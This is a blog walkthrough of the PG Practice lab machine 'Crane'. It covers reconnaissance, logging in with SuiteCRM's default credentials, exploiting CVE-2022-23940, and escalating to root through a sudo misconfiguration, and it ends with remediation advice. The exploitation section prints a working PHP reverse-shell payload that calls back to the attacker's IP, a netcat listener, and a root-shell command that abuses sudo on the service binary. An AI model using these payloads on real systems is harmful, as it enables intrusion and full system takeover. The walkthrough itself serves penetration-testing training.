PG Practice - Crane Walkthrough

Dec 26, 2023 · 5 mins read
OSCP Offsec Penetration Testing Linux
PG Practice - Crane Walkthrough

Attack Narrative

This post details the step-by-step process of a penetration test conducted on the PG Practice machine, Crane. It highlights critical vulnerabilities and misconfigurations that could potentially be exploited by attackers to gain unauthorized access and escalate privileges within a system. The narrative is structured into three key phases: Reconnaissance, Initial Foothold, and Privilege Escalation.

Reconnaissance

The first step in the penetration testing process involved a thorough scanning of the target machine’s network services. Utilizing Nmap, a comprehensive scan of both TCP and UDP ports was conducted against the target with the IP address 192.168.194.146. The scan results revealed several open ports, with the primary port of interest being the web server running on port 80.

nmap --version-intensity=0 --min-rate=150 --max-retries=2 --initial-rtt-timeout=50ms --max-rtt-timeout=200ms --max-scan-delay=5 -Pn -sS -sV -sU -p T:1-65535,U:53,67-69,111,123,135,137-139,161-162,445,500,514,520,631,996-999,1434,1701,1900,3283,4500,5353,49152-49154 192.168.194.146 -oA targeted

Nmap scan report for 192.168.194.146
Host is up (0.054s latency).
Not shown: 65329 closed tcp ports (reset), 4 closed udp ports (port-unreach), 202 filtered tcp ports (no-response), 26 open|filtered udp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
**80/tcp    open  http    Apache httpd 2.4.38 ((Debian))**
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94%I=0%D=12/3%Time=656CDB11%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Upon navigating to the web server, a SuiteCRM login page was encountered. SuiteCRM, a popular customer relationship management platform, is known to have distinct default credentials. These credentials were tested in the subsequent step.

diagram

Initial Foothold and Vulnerability Identification

During the assessment, a significant misconfiguration was uncovered when the default credentials of SuiteCRM, admin:admin, granted administrative access. This vulnerability is commonly attributed to an oversight in not changing default credentials after installation, thereby leaving the system exposed to unauthorized access.

diagram

Upon gaining administrative access, it was discovered that the SuiteCRM platform was running on version 7.12.3. This detail was crucial as it allowed for a focused search for vulnerabilities specific to this version. In this pursuit, a publicly available exploit for CVE-2022-23940 was disocovered. This vulnerability stems from a PHP deserialization issue within the AOR_Scheduled_Reports module.

diagram

CVE-2022-23940

The identified vulnerability, CVE-2022-23940, provided an avenue for remote code execution (RCE) by exploiting the way email recipients were stored and deserialized in the AOR_Scheduled_Reports module. This vulnerability could be leveraged by attackers with the capability to create scheduled reports, allowing them to execute arbitrary code on the server.

An exploit developed by Manuel Zametter, which is available on GitHub, was utilized. This exploit makes use of the Monolog/RCE2 gadget from the phpggc toolkit, demonstrating the practical application of this vulnerability.

diagram

Exploitation

The exploitation process began with cloning the CVE-2022-23940 exploit from GitHub and installing its dependencies. Following a review of the exploit’s usage instructions, a Netcat listener was set up on port 8443 to capture the incoming reverse shell connection.

Downloading Exploit:

git clone https://github.com/manuelz120/CVE-2022-23940

Installing Dependencies:

pip3 install -r "requirements.txt"

Setting Up Netcat Listener:

nc -nvlp 8443

Initially, running the exploit resulted in a ‘bad file descriptor’ error, attributed to shell parsing issues. After adjusting the payload syntax to properly handle special characters and quotes, the exploit was re-executed. This time, the command successfully established a reverse connection, granting access as the www-data user on the target machine

Orginal Payload Syntax:

python3 exploit.py -h http://192.168.194.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.154\", 8443); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

diagram

Working Payload Syntax:

python3 exploit.py -h http://192.168.194.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.154\", 8443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

diagram

Privilege Escalation via Sudo Misconfiguration

To explore potential paths for privilege escalation, the sudo privileges of the www-data user were enumerated. Executing the command sudo -l revealed a misconfiguration: the www-data user was allowed to execute /usr/sbin/service with root privileges without requiring a password.

diagram

diagram

Capitalizing on this misconfiguration, sudo /usr/sbin/service /////bin/bash was executed. This effectively launched a bash shell with root privileges, utilizing a technique known as path traversal, where the command navigates up to the root directory to access the bash shell. The successful privilege escalation was verified by running id, which displayed uid=0(root) gid=0(root) groups=0(root). This confirmed that full root access to the system had been gained.

diagram

Recommendations

SuiteCRM Default Credentials Vulnerability

Change Default Credentials: It is critical to change the default credentials of SuiteCRM to strong, unique passwords. Ideally, these passwords should be at least 16 characters long and include a mix of alphanumeric and special characters. This step is fundamental in preventing unauthorized access.

Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication for an additional layer of security. MFA significantly reduces the risk of compromised credentials leading to unauthorized access.

Restrict Access: Limit access to SuiteCRM strictly to those individuals who require it for their business operations. Implementing role-based access control ensures that users have only the permissions necessary for their roles, reducing the risk surface.

SuiteCRM Remote Code Execution (RCE) Vulnerability

Update SuiteCRM: Ensure that SuiteCRM is updated to a version that addresses this vulnerability. Regular updates and patch management are crucial in mitigating known security vulnerabilities.

www-data User Sudo Privileges Misconfiguration

Restrict Sudo Privileges: Review and restrict the sudo privileges of the www-data user. Ensure that no unnecessary commands can be executed with elevated privileges, especially without a password.

Regular Audits of User Privileges: Conduct regular audits of user privileges to identify and correct any misconfigurations. This should be part of ongoing security maintenance and monitoring activities.

Sharing is caring!